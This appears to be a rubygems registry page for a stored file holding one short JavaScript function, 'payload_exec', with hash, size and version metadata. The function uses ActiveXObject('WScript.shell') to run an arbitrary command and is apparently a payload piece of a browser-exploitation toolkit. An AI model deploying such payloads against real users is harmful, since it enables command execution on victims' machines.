Sha256: cfb489a71c973f073ebdf8e23154a66a48ca7ec1779e532eba22fb5555aa1f8d
Contents?: true
Size: 173 Bytes
Versions: 41
Compression:
Stored size: 173 Bytes
Contents
function payload_exec(cmd) { this.execute = function(explib) { var WshShell = new ActiveXObject("WScript.shell"); var oExec = WshShell.Exec(cmd); } return this; }
Version data entries
41 entries across 41 versions & 1 rubygems